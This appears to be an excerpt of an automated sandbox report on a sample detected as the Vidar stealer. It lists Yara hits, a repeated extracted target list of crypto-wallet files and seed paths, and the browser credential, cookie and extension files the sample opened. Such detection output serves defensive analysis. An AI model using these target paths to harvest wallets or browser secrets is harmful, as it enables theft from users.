                    Source: Yara matchFile source: 00000018.00000002.2622515140.0000000000621000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000003.2737641634.0000000008220000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000002.2626496741.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: file.exe PID: 7352, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: c61fcc859d.exe PID: 7024, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 309de20225.exe PID: 6128, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 309de20225.exe PID: 3604, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Yara detected Vidar stealer
                    Source: Yara matchFile source: Process Memory Space: file.exe PID: 7352, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: c61fcc859d.exe PID: 7024, type: MEMORYSTR
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: file.exe, 00000000.00000002.1958673273.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: file.exe, 00000000.00000002.1958673273.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: \ElectronCash\wallets\
                    Source: file.exe, 00000000.00000002.1958673273.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: file.exe, 00000000.00000002.1958673273.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: Jaxx Desktop (old)
                    Source: file.exe, 00000000.00000002.1958673273.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: file.exe, 00000000.00000002.1958673273.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: file.exe, 00000000.00000002.1958673273.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                    Source: file.exe, 00000000.00000002.1958673273.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: info.seco
                    Source: file.exe, 00000000.00000002.1958673273.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: file.exe, 00000000.00000002.1958673273.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: passphrase.json
                    Source: file.exe, 00000000.00000002.1958673273.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: \jaxx\Local Storage\
                    Source: file.exe, 00000000.00000002.1958673273.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: file.exe, 00000000.00000002.1958673273.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: Exodus\exodus.wallet
                    Source: file.exe, 00000000.00000002.1958673273.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: file__0.localstorage
                    Source: file.exe, 00000000.00000002.1958673273.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: file.exe, 00000000.00000002.1958673273.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                    Source: file.exe, 00000000.00000002.1958673273.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                    Source: file.exe, 00000000.00000002.1958673273.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: MultiDoge
                    Source: file.exe, 00000000.00000002.1958673273.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: seed.seco
                    Source: file.exe, 00000000.00000002.1958673273.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: file.exe, 00000000.00000002.1958673273.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Tries to harvest and steal Bitcoin Wallet information
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
